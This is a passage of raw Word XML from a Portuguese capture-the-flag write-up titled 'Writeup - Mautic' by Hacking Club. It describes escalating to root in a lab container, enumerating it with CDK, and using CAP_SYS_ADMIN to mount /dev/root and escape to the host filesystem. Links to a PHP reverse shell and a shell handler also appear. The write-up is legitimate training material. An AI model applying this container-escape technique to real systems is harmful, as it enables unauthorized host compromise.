      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, podemos executar o comando necessário para assumir privilégios de root no ambiente comprometido.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/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5862638" cy="1277754"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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62638" cy="1277754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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nosso próximo objetivo é escapar do ambiente Docker e obter acesso direto ao host para localizar a última evidência, realizamos uma nova enumeração utilizando a ferramenta CDK (Container Duck). Durante essa análise, foi identificado que o container está em execução com a capability </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="eb5757"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CAP_SYS_ADMIN</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, o que nos fornece permissões avançadas suficientes para tentar um escape do isolamento do container.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834063" cy="1000392"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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34063" cy="1000392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240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/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*Link referência CDK:</w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/cdk-team/CDK*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Efetuando outras análises do ambiente containerizado, a saída do comando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df -h</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> evidenciou que o arquivo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/etc/hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> está montado diretamente a partir de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/dev/root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, dispositivo associado ao sistema de arquivos do host:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE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root@2bcf7a2d9b18:~#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Filesystem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Size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Used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Avail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Use%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Mounted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overlay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14G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3.9G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9.7G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29%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tmpfs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64M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64M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0%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/dev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shm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64M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64M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0%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/dev/shm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/dev/root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14G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3.9G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9.7G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29%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/etc/host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jc w:val="both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C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Essa informação indica que o container possui visibilidade sobre o sistema de arquivos raiz do host por meio de bind mounts. Em combinação com a presença da capability </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="eb5757"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CAP_SYS_ADMIN</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">identificada anteriormente, indica a possibilidade de montar diretamente o dispositivo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="eb5757"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> em um diretório controlado dentro do container, o que pode nos garantir acesso pleno ao sistema de arquivos do host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C7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$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mount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/dev/root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/mnt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$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/mnt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etc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lib64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opt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sbin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sys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bin.usr-is-merged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home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lost+found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sbin.usr-is-merged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tmp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boot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lib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media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root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snap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usr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dev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lib.usr-is-merged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run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srv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CF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Assim conseguimos acesso a nossa última evidência localizada dentro do diretório root do host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D0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748338" cy="2238535"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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8338" cy="2238535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27" w:type="default"/>
      <w:headerReference r:id="rId28" w:type="first"/>
      <w:headerReference r:id="rId29" w:type="even"/>
      <w:footerReference r:id="rId30" w:type="default"/>
      <w:footerReference r:id="rId31" w:type="first"/>
      <w:footerReference r:id="rId32" w:type="even"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="0" w:left="1440" w:right="1440" w:header="0" w:footer="85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Calibri"/>
  <w:font w:name="IBM Plex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IBM Plex Sans SemiBold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7">
    <w:pPr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line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289" w:firstLine="1276"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:shd w:fill="9a309b" w:val="clear"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">© 2025 Hacking Club | Todos os direitos reservados </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                          Página </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f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8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9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1">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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D2">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qnw61nncct6" w:id="7"/>
    <w:bookmarkEnd w:id="7"/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-866774</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="13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b="28627" l="0" r="-7644" t="36271"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="719138" cy="232221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D3"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120" w:before="360" w:lineRule="auto"/>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:color w:val="000000"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32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D4">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark2" style="position:absolute;width:617.76pt;height:793.486642040147pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:absolute;margin-left:-73.98425196850394pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:-1.246028427965058pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2" o:title="image2.png"/>
        </v:shape>
      </w:pic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5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-942974</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="2" name="image14.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image14.png"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="8816" l="0" r="0" t="0"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="7820025" cy="10085729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mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:anchor allowOverlap="1" behindDoc="0" distB="45720" distT="45720" distL="114300" distR="114300" hidden="0" layoutInCell="1" locked="0" relativeHeight="0" simplePos="0">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-330199</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5786120</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6657975" cy="2992348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2390550" y="2454150"/>
                        <a:ext cx="5910900" cy="2651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120" w:before="480" w:line="275.9999942779541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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
                              <w:b w:val="0"/>
                              <w:i w:val="1"/>
                              <w:smallCaps w:val="0"/>
                              <w:strike w:val="0"/>
                              <w:color w:val="ffffff"/>
                              <w:sz w:val="48"/>
                              <w:vertAlign w:val="baseline"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Writeup - Mautic</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr anchorCtr="0" anchor="ctr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45720" distT="45720" distL="114300" distR="114300" hidden="0" layoutInCell="1" locked="0" relativeHeight="0" simplePos="0">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-330199</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5786120</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6657975" cy="2992348"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="1" name="image15.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image15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657975" cy="2992348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6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spacing w:line="240" w:lineRule="auto"/>
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:pict>
        <v:shape id="WordPictureWatermark1" style="position:absolute;width:617.76pt;height:793.486642040147pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:center;mso-position-vertical-relative:margin;mso-position-vertical:center;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId1" o:title="image2.png"/>
        </v:shape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-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5.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cdk-team/CDK*" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10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github.com/fstringuetta/enumport" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cdk-team/CDK*" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId27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hyperlink" Target="https://app.hackingclub.com/training/training-machines/275" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fstringuetta/enumport" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentestmonkey.net/tools/web-shells/php-reverse-shell" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentestmonkey.net/tools/web-shells/php-reverse-shell" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/brightio/penelope" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/brightio/penelope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BMPlexSans-regular.ttf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-bold.ttf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-italic.ttf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-boldItalic.ttf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-italic.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-bold.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-boldItalic.ttf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-regular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Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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4.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15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